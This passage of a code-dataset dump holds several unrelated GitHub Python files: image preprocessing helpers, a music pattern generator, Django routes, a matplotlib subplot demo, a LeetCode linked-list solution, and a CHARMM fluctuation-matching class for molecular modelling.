newData = np.copy(data);\n newData = newData.astype(np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n newData[i] = newData[i] - average.astype(int);\n newData[i][newData[i] < 0] = 0;\n return newData;\n\n# If given an average image, add it to each image\ndef restoreAverage(data, average):\n newData = np.copy(data);\n newData = newData.astype(np.double);\n numOfImages = data.shape[0]\n for i in range(0, numOfImages):\n newData[i] = newData[i] + average.astype(int);\n newData[i][newData[i] > 255] = 255;\n return newData;\n\n'''\n# for testing this bit of code\nimport matplotlib.pyplot as plt\nfilePath = \"/home/alex/Documents/dataset/mipDataBest\"\ndata = loadTrainingData(filePath, 50, 100);\nimages, labels = data;\navg = findAverageImg(images);\nplt.imshow(np.reshape(images[0], (50,50)))\nplt.show();\nmeanLess = removeAverage(images, avg);\nplt.imshow(np.reshape(meanLess[0], (50,50)))\nplt.show();\nwithMean = restoreAverage(images, avg);\nplt.imshow(np.reshape(withMean[0], (50,50)))\nplt.show();\n'''\n","repo_name":"alexMilmore/BruteForceNeuralNet","sub_path":"importData.py","file_name":"importData.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28235539942","text":"import copy, random\nfrom ParleyV2.Utils.RhythmUtils import *\nfrom ParleyV2.Utils.TimingUtils import *\nfrom ParleyV2.Utils.VolumeUtils import *\n\n@dataclass\nclass MelodyPattern:\n intervals: [] = None\n timing_fractions: [] = None\n rests: [] = None\n\n\nclass PatternNoteSequenceGenerator:\n\n def __init__(self, gen_spec):\n self.gen_spec = gen_spec\n\n def apply(self, start_composition):\n composition = copy.deepcopy(start_composition)\n bar_start_volume = None\n patterns_hash = {}\n patterns = []\n for letter in self.gen_spec.get_value(\"pattern_form\"):\n if letter in patterns_hash:\n patterns.append(patterns_hash[letter])\n else:\n patterns.append(self.get_pattern())\n previous_spec = None\n num_patterns = len(patterns)\n for bar in composition.bars:\n pattern = patterns[bar.bar_num % num_patterns]\n spec = self.gen_spec.instantiate_me(composition, bar)\n\n bar_end_volume = int(spec[\"volume\"])\n volume_diff = 0 if bar_start_volume is None else bar_end_volume - bar_start_volume\n if bar.note_sequences is None:\n bar.note_sequences = []\n volume = bar_end_volume if bar_start_volume is None else bar_start_volume + (\n (chord.timing.start64th / 64) * volume_diff)\n volume = int(volume)\n\n note_sequence = NoteSequence(note_sequence_num=NoteSequence.next_note_sequence_num,\n instrument_num=spec[\"instrument_num\"], voice_id=spec[\"voice_id\"],\n track_num=spec[\"track_num\"], channel_num=spec[\"channel_num\"],\n notes=[], bar_num=bar.bar_num)\n composition.note_sequences_hash[note_sequence.note_sequence_num] = note_sequence\n bar.note_sequences.append(note_sequence)\n\n for chord_num in bar.chord_nums:\n chord = composition.chords_hash[chord_num]\n notes = self.get_notes_for_pattern(spec, note_sequence.note_sequence_num, note_sequence.bar_num,\n chord, pattern, volume)\n note_sequence.notes.extend(notes)\n\n VolumeUtils.change_volumes(spec, previous_spec, bar, note_sequence)\n\n bar_start_volume = bar_end_volume\n NoteSequence.next_note_sequence_num += 1\n previous_spec = spec\n\n return composition\n\n def get_pattern(self):\n pattern = MelodyPattern([], [], [])\n num_notes = self.gen_spec.get_value(\"num_notes_in_pattern\")\n while len(pattern.intervals) < num_notes:\n interval = random.randint(0, 7)\n diff = 0 if len(pattern.intervals) == 0 else abs(pattern.intervals[-1] - interval)\n if diff <= 8 and (len(pattern.intervals) == 0 or interval != pattern.intervals[-1]):\n pattern.intervals.append(interval)\n pattern.timing_fractions = [1/len(pattern.intervals) for i in range(0, len(pattern.intervals))]\n num_rests = self.gen_spec.get_value(\"num_pattern_rests\")\n while len(pattern.rests) < num_rests:\n rest_pos = random.randint(0, len(pattern.intervals))\n if rest_pos not in pattern.rests:\n pattern.rests.append(rest_pos)\n return pattern\n\n def get_notes_for_pattern(self, spec, note_sequence_num, bar_num, chord, pattern, volume):\n notes = []\n s64 = 0\n focal_pitch = spec[\"focal_pitch\"]\n for note_num in range(0, len(pattern.intervals)):\n pitch = MusicUtils.get_note_from_chord_interval(chord, focal_pitch, pattern.intervals[note_num])\n d64 = int(pattern.timing_fractions[note_num] * chord.timing.duration64ths)\n timing = Timing(chord.timing.start64th + s64, d64)\n note = Note(pitch=pitch, volume=volume, note_type=\"backbone\",\n timing=timing, chord_num=chord.chord_num,\n note_sequence_num=note_sequence_num, bar_num=bar_num, track_note_num=None,\n tags={})\n s64 += d64\n if note_num not in pattern.rests:\n notes.append(note)\n return notes\n","repo_name":"simoncolton/Parley","sub_path":"ParleyV2/Generators/PatternNoteSequenceGenerator.py","file_name":"PatternNoteSequenceGenerator.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32176701980","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'index'\nurlpatterns = [\n path('', views.index, name='index'),\n path('logout/', views.logout, name='logout'),\n path('signup/', views.signup, name='signup'),\n path('signin/', views.signin, name='signin'),\n]","repo_name":"IllIlIlIllllII/Unist_db_team7","sub_path":"BBGG/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37747275033","text":"#!/usr/bin/env python2.7\n\n'''\nThis script demonstrates how to make a grid of subplots.\n'''\n\n### References\n# guide for laying out grids of plots\n# - http://matplotlib.org/users/tight_layout_guide.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef decorateAxes(ax, title):\n '''\n Decorates Axes for a plot of 2D Lorentzians\n '''\n\n ax.set_title(title)\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n\n# set up data\n\ndim = 211\n\nx = np.linspace(0, 10*np.pi, dim)\n\n# y data are stored in a 2D array\ny = np.zeros((4, dim))\ny[0,:] = np.sin(x)\ny[1,:] = np.cos(x)\ny[2,:] = np.tan(x)\ny[3,:] = np.exp(x)\n\n# set up plot\n\nfig, axes = plt.subplots(2,2) # returns figure and 2x2 numpy array of Axes objects\n\naxes[0, 0].plot(x, y[0, :])\ndecorateAxes(axes[0, 0], \"Sine\")\naxes[0, 1].plot(x, y[1, :])\ndecorateAxes(axes[0, 1], \"Cosine\")\naxes[1, 0].plot(x, y[2, :])\ndecorateAxes(axes[1, 0], \"TANGENT\")\naxes[1, 1].plot(x, y[3, :])\ndecorateAxes(axes[1, 1], \"Exponential\")\n\nplt.title(\"foo\")\n\nplt.tight_layout() # prevents plot labels from overlapping\n\nplt.show()\n\n\n\n### Another way to do it\n\n# list of titles for plots (order is left to right in each row)\ntitles = [\"Sine\", \"Cosine\", \"TANGENT\", \"Exponential\"]\n\nfig, axes = plt.subplots(2,2)\n\n# `enumerate` lets you iterate over a list and its index.\n# `zip` lets you iterate over multiple lists.\n# `enumerate(zip(*)) iterates over multiple lists, plus an index\n# `axes.flat` converts the 2D numpy array to a 1D numpy array\nfor ii, (ax, title) in enumerate(zip(axes.flat, titles)):\n ax.plot(x, y[ii,:])\n decorateAxes(ax, title)\n\nplt.tight_layout()\n\nplt.show()","repo_name":"Seideman-Group/pythonMinicourse","sub_path":"Day3-Plotting/plottingExamples/subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31096952034","text":"#\n# @lc app=leetcode.cn id=25 lang=python3\n#\n# [25] K 个一组翻转链表\n#\n# https://leetcode-cn.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (58.07%)\n# Likes: 614\n# Dislikes: 0\n# Total Accepted: 77.2K\n# Total Submissions: 125.5K\n# Testcase Example: '[1,2,3]\\n2'\n#\n# 给你一个链表,每 k 个节点一组进行翻转,请你返回翻转后的链表。\n#\n# k 是一个正整数,它的值小于或等于链表的长度。\n#\n# 如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。\n#\n#\n#\n# 示例:\n#\n# 给你这个链表:1->2->3->4->5\n#\n# 当 k = 2 时,应当返回: 2->1->4->3->5\n#\n# 当 k = 3 时,应当返回: 3->2->1->4->5\n#\n#\n#\n# 说明:\n#\n#\n# 你的算法只能使用常数的额外空间。\n# 你不能只是单纯的改变节点内部的值,而是需要实际进行节点交换。\n#\n#\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n\n # 迭代\n # 头\n if not head:\n return head\n ans = head\n for i in range(k-1):\n ans = ans.next\n if not ans:\n return head\n while head:\n pre,cur = None,head\n for i in range(k):\n cur.next,cur,pre = pre,cur.next,cur\n # 检查剩余元素\n c = cur\n if not c:\n return ans\n for i in range(k-1):\n c = c.next\n if not c:\n head.next = cur\n return ans\n head.next = c\n head = cur\n return ans\n \n # 递归\n if not head:\n return head\n cur = head\n for i in range(k-1):\n cur = cur.next\n if not cur:\n return head\n pre, cur = self.reverseKGroup(cur.next, k), head\n for i in range(k):\n cur.next, cur, pre = pre, cur.next, cur\n return pre\n\n# @lc code=end\n","repo_name":"kailunfan/lcode","sub_path":"25.k-个一组翻转链表.py","file_name":"25.k-个一组翻转链表.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22384870732","text":"from __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\nfrom future.builtins import (\n dict,\n open,\n range,\n super,\n)\nfrom future.utils import (\n PY2,\n native_str,\n raise_with_traceback,\n)\n\nimport copy\nimport logging\nimport os\nimport subprocess\nimport textwrap\nimport time\nfrom os import path\n\nimport numpy as np\nimport pandas as pd\nfrom scipy import constants\nimport MDAnalysis as mda\nfrom MDAnalysis.lib import util\nfrom MDAnalysis.coordinates.core import reader\nfrom fluctmatch.fluctmatch import base as fmbase\nfrom fluctmatch.fluctmatch import utils as fmutils\nfrom fluctmatch.fluctmatch.data import (\n charmm_init,\n charmm_nma,\n charmm_thermo,\n)\nfrom fluctmatch.intcor import utils as icutils\nfrom fluctmatch.parameter import utils as prmutils\n\nif PY2:\n FileNotFoundError = IOError\n\nlogger = logging.getLogger(__name__)\n\n\nclass CharmmFluctMatch(fmbase.FluctMatch):\n \"\"\"Fluctuation matching using CHARMM.\"\"\"\n bond_def = [\"I\", \"J\"]\n error_hdr = [\"step\", \"Kb_rms\", \"fluct_rms\", \"b0_rms\"]\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialization of fluctuation matching using the CHARMM program.\n\n Parameters\n ----------\n topology : filename or Topology object\n A CHARMM/XPLOR PSF topology file, PDB file or Gromacs GRO file;\n used to define the list of atoms. If the file includes bond\n information, partial charges, atom masses, ... then these data will\n be available to MDAnalysis. A \"structure\" file (PSF, PDB or GRO, in\n the sense of a topology) is always required. Alternatively, an\n existing :class:`MDAnalysis.core.topology.Topology` instance may\n also be given.\n topology_format\n Provide the file format of the topology file; ``None`` guesses it\n from the file extension [``None``] Can also pass a subclass of\n :class:`MDAnalysis.topology.base.TopologyReaderBase` to define a\n custom reader to be used on the topology file.\n format\n Provide the file format of the coordinate or trajectory file;\n ``None`` guesses it from the file extension. Note that this keyword\n has no effect if a list of file names is supplied because the\n \"chained\" reader has to guess the file format for each individual\n list member. [``None``] Can also pass a subclass of\n :class:`MDAnalysis.coordinates.base.ProtoReader` to define a custom\n reader to be used on the trajectory file.\n guess_bonds : bool, optional\n Once Universe has been loaded, attempt to guess the connectivity\n between atoms. This will populate the .bonds .angles and .dihedrals\n attributes of the Universe.\n vdwradii : dict, optional\n For use with *guess_bonds*. Supply a dict giving a vdwradii for each\n atom type which are used in guessing bonds.\n is_anchor : bool, optional\n When unpickling instances of\n :class:`MDAnalysis.core.groups.AtomGroup` existing Universes are\n searched for one where to anchor those atoms. Set to ``False`` to\n prevent this Universe from being considered. [``True``]\n anchor_name : str, optional\n Setting to other than ``None`` will cause\n :class:`MDAnalysis.core.groups.AtomGroup` instances pickled from\n the Universe to only unpickle if a compatible Universe with matching\n *anchor_name* is found. Even if *anchor_name* is set *is_anchor*\n will still be honored when unpickling.\n in_memory\n After reading in the trajectory, transfer it to an in-memory\n representations, which allow for manipulation of coordinates.\n in_memory_step\n Only read every nth frame into in-memory representation.\n outdir\n Output directory\n temperature\n Temperature (in K)\n rmin\n Minimum distance to consider for bond lengths.\n rmax\n Maximum distance to consider for bond lengths.\n charmm_version\n Version of CHARMM for formatting (default: 41)\n extended\n Use the extended format.\n title\n Title lines at the beginning of the file.\n resid\n Include segment IDs in the internal coordinate files.\n nonbonded\n Include the nonbonded section in the parameter file.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.dynamic_params = dict()\n self.filenames = dict(\n init_input=path.join(self.outdir, \"fluctinit.inp\"),\n init_log=path.join(self.outdir, \"fluctinit.log\"),\n init_avg_ic=path.join(self.outdir, \"init.average.ic\"),\n init_fluct_ic=path.join(self.outdir, \"init.fluct.ic\"),\n avg_ic=path.join(self.outdir, \"average.ic\"),\n fluct_ic=path.join(self.outdir, \"fluct.ic\"),\n dynamic_prm=path.join(self.outdir, \"{}.dist.prm\".format(\n self.prefix)),\n fixed_prm=path.join(self.outdir, \".\".join((self.prefix, \"prm\"))),\n psf_file=path.join(self.outdir, \".\".join((self.prefix, \"psf\"))),\n xplor_psf_file=path.join(self.outdir, \".\".join((self.prefix,\n \"xplor\", \"psf\"))),\n crd_file=path.join(self.outdir, \".\".join((self.prefix, \"cor\"))),\n stream_file=path.join(self.outdir, \".\".join((self.prefix,\n \"stream\"))),\n topology_file=path.join(self.outdir, \".\".join((self.prefix,\n \"rtf\"))),\n nma_crd=path.join(self.outdir, \".\".join((self.prefix, \"mini\",\n \"cor\"))),\n nma_vib=path.join(self.outdir, \".\".join((self.prefix, \"vib\"))),\n charmm_input=path.join(self.outdir, \".\".join((self.prefix,\n \"inp\"))),\n charmm_log=path.join(self.outdir, \".\".join((self.prefix, \"log\"))),\n error_data=path.join(self.outdir, \"error.dat\"),\n thermo_input=path.join(self.outdir, \"thermo.inp\"),\n thermo_log=path.join(self.outdir, \"thermo.log\"),\n thermo_data=path.join(self.outdir, \"thermo.dat\"),\n traj_file=self.args[1] if len(self.args) > 1 else path.join(self.outdir, \"cg.dcd\"),\n bond_convergence=path.join(self.outdir, \"bond_convergence.txt\")\n )\n\n # Boltzmann constant\n self.BOLTZ = self.temperature * (constants.k * constants.N_A /\n (constants.calorie * constants.kilo))\n\n # Bond factor mol^2-Ang./kcal^2\n self.KFACTOR = 0.02\n\n # Self consistent error information.\n self.error = pd.DataFrame(\n np.zeros((1, len(self.error_hdr)), dtype=np.int),\n columns=self.error_hdr,\n )\n\n def _create_ic_table(self, universe, data):\n data.set_index(self.bond_def, inplace=True)\n table = icutils.create_empty_table(universe.atoms)\n hdr = table.columns\n table.set_index(self.bond_def, inplace=True)\n table.drop(\n [\n \"r_IJ\",\n ], axis=1, inplace=True)\n table = pd.concat([table, data[\"r_IJ\"]], axis=1)\n return table.reset_index()[hdr]\n\n def initialize(self, nma_exec=None, restart=False):\n \"\"\"Create an elastic network model from a basic coarse-grain model.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n restart : bool, optional\n Reinitialize the object by reading files instead of doing initial\n calculations.\n \"\"\"\n self.restart = restart\n if not self.restart:\n # Write CHARMM input file.\n if not path.exists(self.filenames[\"init_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\n \"dimension chsize 1000000\" if version >= 36 else \"\")\n with open(\n self.filenames[\"init_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_init.init.format(\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n with open(self.filenames[\"init_log\"], \"w\") as log_file:\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"init_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n\n # Write the parameter files.\n with reader(self.filenames[\"init_fluct_ic\"]) as icfile:\n std_bonds = icfile.read().set_index(self.bond_def)\n with reader(self.filenames[\"init_avg_ic\"]) as icfile:\n avg_bonds = icfile.read().set_index(self.bond_def)\n target = pd.concat([std_bonds[\"r_IJ\"], avg_bonds[\"r_IJ\"]], axis=1)\n target.reset_index(inplace=True)\n logger.info(\"Calculating the initial CHARMM parameters...\")\n universe = mda.Universe(\n self.filenames[\"xplor_psf_file\"], self.filenames[\"crd_file\"]\n )\n self.target = prmutils.create_empty_parameters(universe, **self.kwargs)\n target.columns = self.target[\"BONDS\"].columns\n self.target[\"BONDS\"] = target.copy(deep=True)\n self.parameters = copy.deepcopy(self.target)\n self.parameters[\"BONDS\"][\"Kb\"] = (\n self.BOLTZ / self.parameters[\"BONDS\"][\"Kb\"].apply(np.square))\n self.dynamic_params = copy.deepcopy(self.parameters)\n with mda.Writer(self.filenames[\"fixed_prm\"], **self.kwargs) as prm:\n logger.info(\"Writing {}...\".format(\n self.filenames[\"fixed_prm\"]))\n prm.write(self.parameters)\n with mda.Writer(self.filenames[\"dynamic_prm\"],\n **self.kwargs) as prm:\n logger.info(\"Writing {}...\".format(\n self.filenames[\"dynamic_prm\"]))\n prm.write(self.dynamic_params)\n else:\n print(\"FM Restarted\")\n if not path.exists(self.filenames[\"fixed_prm\"]):\n self.initialize(nma_exec, restart=False)\n try:\n # Read the parameter files.\n logger.info(\"Loading parameter and internal coordinate files.\")\n with reader(self.filenames[\"fixed_prm\"]) as fixed:\n self.parameters.update(fixed.read())\n with reader(self.filenames[\"dynamic_prm\"]) as dynamic:\n self.dynamic_params.update(dynamic.read())\n\n # Read the initial internal coordinate files.\n with reader(self.filenames[\"init_avg_ic\"]) as init_avg:\n avg_table = init_avg.read().set_index(\n self.bond_def)[\"r_IJ\"]\n\n with reader(self.filenames[\"init_fluct_ic\"]) as init_fluct:\n fluct_table = (init_fluct.read().set_index(\n self.bond_def)[\"r_IJ\"])\n table = pd.concat([fluct_table, avg_table], axis=1)\n\n # Set the target fluctuation values.\n logger.info(\"Files loaded successfully...\")\n self.target = copy.deepcopy(self.parameters)\n self.target[\"BONDS\"].set_index(self.bond_def, inplace=True)\n cols = self.target[\"BONDS\"].columns\n table.columns = cols\n self.target[\"BONDS\"] = table.copy(deep=True).reset_index()\n\n except (FileNotFoundError, IOError):\n raise_with_traceback(\n (IOError(\"Some files are missing. Unable to restart.\")))\n\n def run(self, nma_exec=None, tol=1.e-3, n_cycles=300, low_bound=0.):\n \"\"\"Perform a self-consistent fluctuation matching.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n tol : float, optional\n fluct difference tolerance\n n_cycles : int, optional\n number of fluctuation matching cycles\n low_bound : float, optional\n lowest Kb values to reduce noise\n \"\"\"\n # Find CHARMM executable\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n if charmm_exec is None:\n logger.exception(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\")\n raise_with_traceback(\n OSError(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\"))\n\n # Read the parameters\n if not self.parameters:\n try:\n self.initialize(nma_exec, restart=True)\n except IOError:\n raise_with_traceback(\n (IOError(\"Some files are missing. Unable to restart.\")))\n\n # Write CHARMM input file.\n if not path.exists(self.filenames[\"charmm_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\"dimension chsize 1000000\" if version >= 36 else \"\")\n with open(\n self.filenames[\"charmm_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_nma.nma.format(\n temperature=self.temperature,\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n # Set the indices for the parameter tables.\n self.target[\"BONDS\"].set_index(self.bond_def, inplace=True)\n bond_values = self.target[\"BONDS\"].columns\n\n # Check for restart.\n try:\n if os.stat(self.filenames[\"error_data\"]).st_size > 0:\n with open(self.filenames[\"error_data\"], \"rb\") as data:\n error_info = pd.read_csv(\n data,\n header=0,\n skipinitialspace=True,\n delim_whitespace=True)\n if not error_info.empty:\n self.error[\"step\"] = error_info[\"step\"].values[-1]\n else:\n raise FileNotFoundError\n except (FileNotFoundError, OSError):\n with open(self.filenames[\"error_data\"], \"wb\") as data:\n np.savetxt(\n data, [\n self.error_hdr,\n ],\n fmt=native_str(\"%15s\"), # Nix\n delimiter=native_str(\"\"))\n self.error[\"step\"] += 1\n\n # Initiate an all true index data, for preserving bond convergence\n if not self.restart:\n temp = ~self.target[\"BONDS\"][\"Kb\"].isna()\n temp = temp.reset_index()\n self.converge_bnd_list = temp.iloc[:, 2]\n\n # Start self-consistent iteration for Fluctuation Matching\n # Run simulation\n logger.info(f\"Starting fluctuation matching--{n_cycles} iterations to run\")\n if low_bound != 0.:\n logger.info(f\"Lower bound after 75% iteration is set to {low_bound}\")\n st = time.time()\n fdiff = []\n for i in range(n_cycles):\n ct = time.time()\n self.error[\"step\"] = i + 1\n with open(self.filenames[\"charmm_log\"], \"w\") as log_file:\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"charmm_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n self.dynamic_params[\"BONDS\"].set_index(self.bond_def, inplace=True)\n self.parameters[\"BONDS\"].set_index(self.bond_def, inplace=True)\n\n # Read the average bond distance.\n with reader(self.filenames[\"avg_ic\"]) as icavg:\n avg_ic = icavg.read().set_index(self.bond_def)[\"r_IJ\"]\n\n # Read the bond fluctuations.\n with reader(self.filenames[\"fluct_ic\"]) as icfluct:\n fluct_ic = icfluct.read().set_index(self.bond_def)[\"r_IJ\"]\n\n vib_ic = pd.concat([fluct_ic, avg_ic], axis=1)\n vib_ic.columns = bond_values\n logger.info(f\"Checking for bondlist convergence\")\n fluct_diff = np.abs(vib_ic[bond_values[0]] - self.target[\"BONDS\"][bond_values[0]])\n fdiff.append(fluct_diff)\n fluct_diff = fluct_diff.reset_index()\n tmp = self.parameters[\"BONDS\"][bond_values[0]].reset_index()\n\n if not self.restart:\n self.converge_bnd_list &= ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n else:\n if i == 0:\n self.converge_bnd_list = ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n else:\n self.converge_bnd_list &= ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n\n # Calculate the r.m.s.d. between fluctuation and distances\n # compared with the target values.\n vib_error = self.target[\"BONDS\"] - vib_ic\n vib_error = vib_error.apply(np.square).mean(axis=0)\n vib_error = np.sqrt(vib_error)\n self.error[self.error.columns[-2:]] = vib_error.T.values\n\n # Calculate the new force constant.\n optimized = vib_ic.apply(np.reciprocal).apply(np.square)\n target = self.target[\"BONDS\"].apply(np.reciprocal).apply(np.square)\n optimized -= target\n optimized *= self.BOLTZ * self.KFACTOR\n\n # update bond list\n vib_ic[bond_values[0]] = (self.parameters[\"BONDS\"][bond_values[0]]\n - optimized[bond_values[0]])\n vib_ic[bond_values[0]] = (\n vib_ic[bond_values[0]].where(vib_ic[bond_values[0]] >= 0., 0.)) # set negative to zero\n\n if low_bound > 0. and i > int(n_cycles * 0.75):\n logger.info(f\"Fluctuation matching cycle {i}: low bound is {low_bound}\")\n vib_ic[bond_values[0]] = (vib_ic[bond_values[0]].where(vib_ic[bond_values[0]] >= low_bound, 0.))\n\n # r.m.s.d. between previous and current force constant\n diff = self.dynamic_params[\"BONDS\"] - vib_ic\n diff = diff.apply(np.square).mean(axis=0)\n diff = np.sqrt(diff)\n self.error[self.error.columns[1]] = diff.values[0]\n\n # Update the parameters and write to file.\n self.parameters[\"BONDS\"][bond_values[0]] = vib_ic[bond_values[0]]\n self.dynamic_params[\"BONDS\"][bond_values[0]] = vib_ic[bond_values[0]]\n self.dynamic_params[\"BONDS\"][bond_values[1]] = vib_ic[bond_values[1]]\n\n self.parameters[\"BONDS\"].reset_index(inplace=True)\n self.dynamic_params[\"BONDS\"].reset_index(inplace=True)\n with mda.Writer(self.filenames[\"fixed_prm\"], **self.kwargs) as prm:\n prm.write(self.parameters)\n with mda.Writer(self.filenames[\"dynamic_prm\"],\n **self.kwargs) as prm:\n prm.write(self.dynamic_params)\n\n # Update the error values.\n with open(self.filenames[\"error_data\"], \"ab\") as error_file:\n np.savetxt(\n error_file,\n self.error,\n fmt=native_str(\"%15d%15.6f%15.6f%15.6f\", ), # Nix\n delimiter=native_str(\"\"),\n )\n logger.info(\"Fluctuation matching cycle {} completed in {:.6f}\".format(\n i, time.time() - ct))\n logger.info(f\"{self.converge_bnd_list.sum()} not converged out of {len(self.converge_bnd_list)}\")\n\n if self.converge_bnd_list.sum() <= len(self.converge_bnd_list.values.tolist()) * 0.003:\n # if bonds to converge is less than 0.3% of total bonds, use relative difference as criteria\n # as it takes more than 100 iterations for these 0.3% bonds to converge.\n relative_diff = (fluct_diff.iloc[:, 2] - tol) / tol\n\n ### To know the late converged bonds uncomment the below 5 lines ###\n\n # late_converged = pd.DataFrame()\n # indx = self.converge_bnd_list[self.converge_bnd_list].index.values\n # late_converged = pd.concat([fluct_diff.loc[indx], relative_diff.loc[indx]], axis=1)\n # late_converged.columns = [\"I\", \"J\", \"fluct_diff_Kb\", \"relative_diff_kb\"]\n # print(late_converged)\n\n self.converge_bnd_list = self.converge_bnd_list & (relative_diff > 5)\n if self.converge_bnd_list.sum() == 0:\n logger.info(\"Checking relative difference: All bonds converged, exiting\")\n break\n fluct_conv = pd.concat(fdiff, axis=1).round(6)\n fluct_conv.columns = [j for j in range(1, i + 2)]\n fluct_conv.to_csv(self.filenames[\"bond_convergence\"])\n logger.info(\"Fluctuation matching completed in {:.6f}\".format(\n time.time() - st))\n self.target[\"BONDS\"].reset_index(inplace=True)\n\n def calculate_thermo(self, nma_exec=None):\n \"\"\"Calculate the thermodynamic properties of the trajectory.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n \"\"\"\n # Find CHARMM executable\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n if charmm_exec is None:\n logger.exception(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\")\n raise_with_traceback(\n OSError(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\"))\n\n if not path.exists(self.filenames[\"thermo_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\"dimension chsize 500000 maxres 3000000\"\n if version >= 36 else \"\")\n with open(\n self.filenames[\"thermo_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_thermo.thermodynamics.format(\n trajectory=path.join(self.outdir, self.args[-1]),\n temperature=self.temperature,\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n # Calculate thermodynamic properties of the trajectory.\n with open(self.filenames[\"thermo_log\"], \"w\") as log_file:\n logger.info(\"Running thermodynamic calculation.\")\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"thermo_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n logger.info(\"Calculations completed.\")\n\n header = (\"SEGI RESN RESI Entropy Enthalpy \"\n \"Heatcap Atm/res Ign.frq\")\n columns = np.array(header.split())\n columns[:3] = np.array([\"segidI\", \"RESN\", \"resI\"])\n thermo = []\n\n # Read log file\n with open(self.filenames[\"thermo_log\"], \"rb\") as log_file:\n logger.info(\"Reading CHARMM log file.\")\n for line in log_file:\n if line.find(header) < 0:\n continue\n break\n for line in log_file:\n if len(line.strip().split()) == 0:\n break\n thermo.append(line.strip().split())\n\n # Create human-readable table\n thermo = pd.DataFrame(thermo, columns=columns)\n thermo.drop([\"RESN\", \"Atm/res\", \"Ign.frq\"], axis=1, inplace=True)\n thermo.set_index([\"segidI\", \"resI\"], inplace=True)\n thermo = thermo.astype(np.float)\n\n # Write data to file\n with open(self.filenames[\"thermo_data\"], \"wb\") as data_file:\n logger.info(\"Writing thermodynamics data file.\")\n thermo = thermo.to_csv(\n index=True,\n sep=native_str(\" \"),\n float_format=native_str(\"%.4f\"),\n encoding=\"utf-8\")\n data_file.write(thermo.encode())\n","repo_name":"nixnmtm/SMSL","sub_path":"src/fluctmatch/fluctmatch/charmmfluctmatch.py","file_name":"charmmfluctmatch.py","file_ext":"py","file_size_in_byte":25736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72518590489","text":"from src.application.infra.pyside.ui.core import QRadioButton\n\n\nclass CustomRadioButtom(QRadioButton):\n def __init__(self, parent=None, name: str = None):\n super(CustomRadioButtom, self).__init__(parent)\n print(name)\n self.setObjectName(u\"radio_\"+name)\n self.setText(name)\n self.setStyleSheet(\"color: black;\")\n\n def clear_object(self):\n 